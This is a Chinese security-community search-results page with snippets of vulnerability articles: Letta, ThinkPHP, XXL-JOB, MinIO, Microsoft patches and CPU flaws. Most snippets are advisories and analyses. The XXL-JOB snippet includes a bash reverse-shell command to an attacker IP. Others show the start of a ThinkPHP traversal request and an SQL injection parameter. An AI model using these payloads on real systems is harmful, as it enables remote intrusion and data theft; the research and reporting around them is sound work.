首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • Letta 代码执行漏洞 (CVE-2025-51482)

    漏洞介绍:Letta(原名 MemGPT)是一个开源框架,旨在构建具备长期记忆、上下文管理和高级推理能力的 AI Agent,也支持将这些 Agent 以微服务形式部署为 REST API 服务,可被集成到应用中使用 漏洞出现在 Letta 服务端的 run_tool_from_source 接口中,该接口会直接执行用户提交的 Python 源码,原本应通过本地沙箱机制(local sandbox)来限制危险操作,但实际实现存在缺陷 漏洞影响:该接口是 Letta 中提供“工具执行”能力的开放端点,设计用于在 AI Agent 中运行自定义脚本工具。 全球分布图:漏洞编号:CVE-2025-51482漏洞等级:高危受影响版本:已知影响 Letta 0.7.12 版本漏洞类型:远程代码执行利用流程:漏洞复现:在本地或测试服务器部署 Letta 后,攻击者可直接向 2、尽快升级 Letta 到官方包含漏洞修复的版本,或合并官方补丁自行构建。

    26110编辑于 2025-12-10
  • 来自专栏全栈程序员必看

    thinkphp5.0漏洞_thinkphp6漏洞

    PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入的漏洞。 0x01 漏洞分析和利用场景 该漏洞形成最关键的一点是需要开启debug模式,而Tp官方最新的版本5.0.9默认依旧是开放着调试模式 下载最新版本的5.0.9完整版 本地按照官方给的文档安装成功后, Like 、not like 、in 、not in 0x02 案例分析 笔者这里下载了一套商城系统 ,这个框架也是很听话的用了官方的配置,debug模式开启 下图是可以触发该漏洞的一段代码 Ids ids[0’\]=1 笔者尝试着连接对方的数据库,可惜的是运气不好 0x04漏洞总结 Tp5.0框架采用PDO机制已经很安全了,只要不出现拼接字符的现象,至少在绑定参数查询的时候不会产生注入漏洞;也由此可见 0x05漏洞修复 对于这个$k 可以过滤掉所有的特殊字符,以防特殊字符的引入造成MYSQL的报错;当然最好的办法还是关闭掉debug模式,期待官方升级最新的版本把debug模式默认关闭掉。

    2.1K30编辑于 2022-10-02
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-6

    搭建XSS测试平台 XSS测试平台是测试XSS漏洞获取cookie并接受Web页面的平台,XSS可以做JS能做的所有事情,包括但不限于窃取cookie,后台增删改文章,利用XSS漏洞进行传播,修改网页代码

    52130编辑于 2022-03-18
  • 来自专栏深度学习与python

    4 万星开源项目被指造假!MemGPT 作者开撕 Mem0:为营销随便造数据,净搞没有意义的测试!

    6 月时候,Sarah 在 GitHub 上询问 Mem0 是如何获得 MemGPT 的相关数据的,但没有回应。 Letta 表示。 当地时间 8 月 12 日,Letta 发文称,Letta 在 LoCoMo 上仅通过将对话历史存储在文件中(而不是使用专门的记忆或检索工具),就达到了 74.0% 的准确率。 Letta 表示,虽然 Letta 本身没有原生方式导入 LoCoMo 那样的对话历史,但其最近为 Letta 智能体(包括 MemGPT 智能体)增加了文件系统功能。 Letta:能力比工具更重要 Letta 认为,如今的智能体在使用工具方面非常高效,尤其是那些很可能出现在训练数据中的工具,如文件系统操作。 Letta 先推荐了自家的 Letta Memory Benchmark(Letta 排行榜) 提供了同类对比(apples-to-apples),在保持框架(目前仅 Letta)和工具不变的情况下,评估不同模型在记忆管理方面的能力

    76510编辑于 2025-08-24
  • 来自专栏OneMoreThink的专栏

    漏洞研究(6):XXL-JOB调度中心默认口令漏洞

    GLUE(Shell IDE) 6. 【编写EXP代码】 1. bash -i >& /dev/tcp/10.58.81.119/1234 0>&1 7. 保存 8. 源码备注 9. 保存 10. 执行一次 6. 保存 4.1.4 查看日志 1. 任务管理 2. 【选择对应执行器】 3. 【选择对应任务】 4. 操作 5. 查询日志 6. 【选择对应日志】 7. 操作 8. 此时使用默认口令登录,提示帐号或密码错误,说明漏洞修复成功。 5.2 代码中修改默认口令 使用32位小写md5值,替换掉默认口令。 source /usr/local/xxl-job-2.2.0/doc/db/tables_xxl_job.sql exit 新部署好XXL-JOB后,使用默认口令登录,提示帐号或密码错误,说明漏洞不存在

    2K01编辑于 2025-05-13
  • 来自专栏API安全

    6月API安全漏洞报告

    为了让大家的API更加安全,致力于守护数字世界每一次网络调用,小阑给大家整理了6月份的一些API安全漏洞报告,希望大家查漏补缺及时修复自己API可能出现的漏洞。 No.1 MinIO未授权信息泄露漏洞漏洞详情:MinIO是一个开源的对象存储服务,它提供了云存储功能,可用于存储和管理大量数据。 漏洞危害:未授权信息泄露漏洞指的是MinIO实例没有正确的访问控制设置,使得未经授权的用户能够访问和下载存储在MinIO中的敏感数据。 No.2 Joomla Rest API未授权访问漏洞漏洞详情:Joomla Rest API 未授权访问漏洞(CVE-2023-23752),是由于Joomla对Web服务端点的访问控制存在缺陷,鉴权存在错误 一篇由Security Boulevard提供的漏洞文章,涵盖了Argo CD部署平台中的三个独立的API漏洞漏洞危害:第一个漏洞(CVE-2023-22736)是一个允许绕过授权的严重漏洞

    1.2K10编辑于 2023-06-30
  • 来自专栏绿盟科技安全情报

    漏洞通告】微软6月安全更新多个产品高危漏洞通告

    版本: 1.0 1 漏洞概述 北京时间6月10日,微软发布6月安全更新补丁,修复了130个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Edge 本月微软月度更新修复的漏洞中,严重程度为关键(Critical)的漏洞共有12个,重要(Important)漏洞有118个。 根据产品流行度和漏洞重要性筛选出此次更新中包含影响较大的漏洞,请相关用户重点进行关注: CVE-2020-1206(PoC已公开):Windows SMBv3 客户端/服务器信息泄漏漏洞 Microsoft 攻击者利用此漏洞可获取到敏感信息。 与SMBv3Ghost有关的内容可参考:https://mp.weixin.qq.com/s/q3dL6YI0K-cFLbNzySabHQ 官方通告链接: https://portal.msrc.microsoft.com

    1.4K20发布于 2020-06-15
  • 腾讯安全态势研究:2025年度云上网络攻击态势报告

    AI应用的架构特性导致SSRF风险高AIAgent进入攻击视野Letta、AgentScope下半年出现攻击2026年可能成为新热点AI算力成为挖矿目标Ray被入侵后89%用于挖矿攻击者看中AI基础设施的 ,时间窗口压缩到小时级僵尸资产触目惊心2019年老漏洞仍造成3万次入侵大量系统"带病运行"6年,安全债务已成定时炸弹游戏APT攻击需要关注云上超过50%游戏公司被游戏APT入侵成功,目的是窃取源码搭建私服除了传统的暴露面漏洞入侵 6、攻击技术分析:攻击者的“工具箱”6.1常见攻击命令模式黑吃黑:服务器沦为攻击者的“修罗场”命令模式用途pipe_chain管道链式执行,绕过检测curl_download下载恶意载荷rm_files 6.2下载基础设施Top6恶意下载域名:⚠️关于合法平台滥用的说明下表中出现的github.com、gist.githubusercontent.com、raw.githubusercontent.com 9、2025年云上攻击呈现6大特点9.1AI基础设施成为攻击者的新战场攻击者不只盯着个别AI产品,而是系统性地扫描整个AI生态。9.2挖矿攻击的“工业化”近半数成功入侵与挖矿相关。

    84010编辑于 2026-02-26
  • 来自专栏安恒信息

    解读 | 6个问题深度解读CPU漏洞

    近日,谷歌Project Zero安全团队公布了两组CPU特性漏洞,分别命名为Meltdown和Spectre,安恒信息应急响应中心于日前已关注此漏洞并发布漏洞预警。 问 此次漏洞的危害是什么? 本次漏洞影响范围非常广泛,几乎所有的个人电脑、独立式服务器、云计算务器、各类智能手机、IoT设备、其他智能终端设备等都受到影响。 问 这次漏洞的CPU厂商影响范围有哪些? 此次漏洞虽然属于硬件层面漏洞,但是仅通过CPU厂商进行修复无法完全解决,需要各操作系统厂商、虚拟化厂商、软硬件分销商、浏览器厂商协作才能彻底修复漏洞。 虽然漏洞影响极为广泛,但对于普通网民不必过于恐慌。对于普通网民来说,需要用存在漏洞的浏览器带有漏洞利用代码的恶意网站才可导致用户的个人隐私的泄漏。

    1.4K90发布于 2018-04-10
  • 来自专栏极安御信安全研究院

    漏洞分析丨HEVD-0x6.UninitializedStackVariable

    作者selph前言窥探Ring0漏洞世界:未初始化栈变量漏洞上一篇探讨了空指针解引用漏洞的利用,这里来探讨另一种漏洞,未初始化栈变量漏洞,未初始化变量本身是没啥事的,但如果这个变量结构里存储了会拿出来执行的东西 (回调函数啥的),那就是另一回事了实验环境:•虚拟机:Windows 7 x86•物理机:Windows 10 x64•软件:IDA,Windbg,VS2022漏洞分析老样子,先IDA找到该漏洞的触发函数 漏洞利用​那么问题来了,要如何去控制回调地址呢? "pause");   system("cmd.exe");   return 0;}截图演示图片参考资料•[1] Windows Kernel Exploitation Tutorial Part 6: [05] HEVD 内核漏洞之未初始化栈变量 | Saturn35 https://saturn35.com/2019/07/26/20190726-2/•[6] C library function

    50920编辑于 2022-07-21
  • 来自专栏网站漏洞修补

    Thinkphp-v6版本漏洞复现

    使用thinkphp并开启多语言的网站漏洞指纹如下:header="think_lang"漏洞影响版本范围v6.0.0<=ThinkPHP<=v6.0.13v5.0.0<=ThinkPHP<=5.0.12v5.1.0 这个漏洞利用的前提,必须要thinkphp开启多语言这一功能,像一些外贸公司网站,一些企业网站,想使用多语言的网站都是可以利用该漏洞进行远程代码执行漏洞的。 具体的GET漏洞利用数据包如下:GET/index.php?s=index/index/index/think_lang/../.. 我们SINE安全建议广大站长以及网站运营者,尽快的升级thinkphp到最高版本,目前Thinkphp官方在最新版本中修复了这个漏洞,也可以对该pearcmd文件进行强制删除,待代码漏洞修复后,还原该pearcmd 文件,也可以找专业的网站安全公司进行代码漏洞修复和整体的网站安全加固。

    3.4K40编辑于 2022-12-12
  • 来自专栏FreeBuf

    不被PayPal待见的6个安全漏洞

    最近,Cybernews分析人员称,他们发现了和PayPal相关的6个高危漏洞,攻击者利用这些漏洞可以实现:绕过PayPal登录后的双因素认证(2FA)、使用其内部智能聊天系统发送恶意代码。 然而就在上报了这些漏洞后,Cybernews遇到了无休止拖延、无人回应、含糊响应和不被重视的情形。以下是Cybernews就发现的6漏洞进行的说明,抛开是非对错,我们只来围观其技术姿势就好。 认证漏洞漏洞6:安全问题输入中存在持久型XSS 该漏洞漏洞5类似,原因在于PayPal未对安全问题的用户输入答案实施过滤,导致存在XSS,我们可以使用MITM代理对其抓包构造,实现XSS触发。 PayPal对该漏洞的回应称已有其他安全人员提交过该漏洞,而就在同一天,PayPal对该漏洞进行了修复。

    4K30发布于 2020-03-24
  • 来自专栏云鼎实验室的专栏

    2025年6月企业必修安全漏洞清单

    腾讯云安全参考“安全漏洞的危害及影响力、漏洞技术细节披露情况、该漏洞在安全技术社区的讨论热度”等因素,综合评估该漏洞在攻防实战场景的风险。 当漏洞综合评估为风险严重、影响面较广、技术细节已披露,且被安全社区高度关注时,就将该漏洞列入必修安全漏洞候选清单。 腾讯云安全定期发布安全漏洞必修清单,以此指引企业安全运维人员修复漏洞,从而避免重大损失。 以下是2025年6月份必修安全漏洞清单: 一、Apache Kafka Client任意文件读取漏洞(CVE-2025-27817) 二、Gogs 远程代码执行漏洞(CVE-2024-56731) 三、 未授权访问致代码执行漏洞(CVE-2025-49596) 漏洞介绍及修复建议详见后文 一、 Apache Kafka Client 任意文件读取漏洞 漏洞概述 腾讯云安全近期监测到Apache官方发布了关于

    11610编辑于 2026-04-09
  • 来自专栏Khan安全团队

    CVE-2020-9967-Apple macOS 6LowPAN漏洞

    这导致了在macOS 10.15.4的6LowPAN代码中发现了一个本地根到内核(虽然被苹果记录为远程)的漏洞。 该问题已于2020年5月11日报告给苹果。 在我深入研究我在这里发现的漏洞之前,了解一下6LowPAN的背景是有帮助的。 任何引入xnu的实质性变化都值得调查,因为这些很可能是引入新漏洞的来源。 IPv6数据包必须在数据帧上进行。当我们在 "漏洞部分 "中讨论XNU代码库内的解析时,这些细节将很重要。帧已经被解析以确定头,然后有效载荷部分被处理。 这意味着6LowPAN有效载荷在接收时是被压缩的。这也将是理解该漏洞时的一个重要观察。 数据链路层调度 问题是,我们如何将6LowPAN帧送到苹果设备上,是否会自动处理?

    1.1K20发布于 2020-12-28
  • 来自专栏红日安全

    Web安全Day6 – 业务逻辑漏洞实战攻防

    每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶场基本上三种靶场全部涵盖)-实战演练(主要选择相应CMS或者是Vulnhub 业务逻辑实战攻防 1.1 逻辑漏洞概述 逻辑漏洞,之所以称为逻辑漏洞,是由于代码逻辑是通过人的逻辑去判断,每个人都有自己的思维,自己的思维容易产生不同想法,导致编写完程序后随着人的思维逻辑产生的不足,大多数逻辑漏洞无法通过防火墙 ,waf等设备进行有效的安全防护,在我们所测试过的平台中基本都有发现,包括任意查询用户信息、任意删除等行为;最严重的漏洞出现在账号安全,包括验证码暴力破解、任意用户密码重置、交易支付、越权访问等等。 1.2 常见的逻辑漏洞 交易支付、密码修改、密码找回、越权修改、越权查询、突破限制等各类逻辑漏洞。 下图是简单的逻辑漏洞总结,当然肯定不只这些,逻辑漏洞很多时候需要脑洞大开: 1.3 如何挖掘逻辑漏洞 确定业务流程--->寻找流程中可以被操控的环节--->分析可被操控环节中可能产生的逻辑问题--->

    1.3K20发布于 2020-02-21
  • 来自专栏渗透测试专栏

    渗透测试XSS漏洞原理与验证(6)——Cookie攻击

    主要记录与用户相关的一些状态或者设置,比如用户名、ID、访问次数等。当用户下一次访问这个网站的时候,网站会先访问用户机器上对应的该网站的Cookie文件。

    98600编辑于 2024-11-08
  • 来自专栏信安之路

    Thinkphp 6 小于 6.0.2 任意文件创建覆盖漏洞分析

    本文作者:1x2Bytes(信安之路红蓝对抗小组成员) 6.0.0 中有两个版本存在该漏洞, dev 版本只能覆盖任意位置的文件,6.0.0-1 则可以在特定的情况下控制写入的内容实现 getshell ,看到一些师傅的 blog 的文章使用 composer 下载的源码, Thinkphp6 也确实开始使用 composer 的方式进行安装但是我使用 composer 方式下载的源码无法复现,猜测进行了修复 ,于是在网上找一键安装包,找了半天找到一个 11 月份的版本遂复现成功.` 具体漏洞位置: 在vendor\topthink\framework\src\think\session\Store.php sessionId); } $this->init = false; } 这里 $this->handler->write($sessionId, $data)是漏洞的关键位置

    2.5K20发布于 2020-02-24
  • 来自专栏渗透测试专栏

    渗透测试SQL注入漏洞原理与验证(6)——SQLMAP基础

    SQLMAPSQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。SQLMAP可以对URL干嘛? SQLMAP检测注入漏洞的流程网站连通性检测:检测目标的连接状态。WAF探测:检测网站是否受WAF保护。网页稳定性检测:检测网页是否稳定。参数动态性检测:检测参数是否具有动态性。

    1.5K10编辑于 2024-09-26
  • 来自专栏魏艾斯博客www.vpsss.net

    2018 年 6 月 wordpress 最新漏洞及解决办法

    最近 wordpress 爆出最新漏洞,2018 年 6 月 29 日,该网站漏洞通杀所有 wordpress 版本,包括目前的 wordpress 4.8.6 以及 wordpress 4.9.6 版本 可以删除网站上的任意文件,影响危害严重,甚至是致命的一个漏洞,如果被攻击者利用,后果将不堪设想。截止目前该漏洞还未有被修复。 如果您在使用 wordpress,请尽快将 wp-includes 文件夹下的 post.php 文件改名,等官方出 wordpress 漏洞补丁后,再改回并升级。 以上是网传文章的一个解决办法,那么这个漏洞会删除 wp-config.php 文件,大家都知道这是 wordpress 配置文件,没有了他数据库无法连接,很多设置也没有了,等于把 wordpress 给瘫痪了

    91660发布于 2018-07-03
  • 来自专栏安恒信息

    6款因“主密钥漏洞”受感染的Android应用

    安全公司赛门铁克在自己的官方博客上发表文章,称首度发现 6 款因为 Android“主密钥”漏洞而受到感染的应用,均来自中国,且为同一攻击者,但是博客并未透露具体是在哪个应用市场发现的。 这种所谓的“主密钥”漏洞即是本月早些时候移动安全公司 Bluebox 披露的一个威胁99%Android设备的漏洞。 该漏洞可令黑客在不改变应用密钥签名的情况下篡改 APK(安装包)代码,从而读取设备上任意手机应用的数据(电子邮件、短信、文档等),获取保存在手机上的所有账号和密码,接管并控制手机的正常功能。    迄今为止,Norton Mobile Insight 共发现了 6 款被感染的 Android 应用,均为中国应用市场上发现,且攻击者为同一人,被发现的受感染应用被命名为Android.Skullkey 受感染应用截屏    从赛门铁克博客提供的截图来看,这 6 款受感染应用的其中两款为“医生预约”、“我的工作站”,随后博客又更新了 4 款受感染应用,但并未给出应用名称,只说是分别为一款流行的新闻应用

    97140发布于 2018-04-09
领券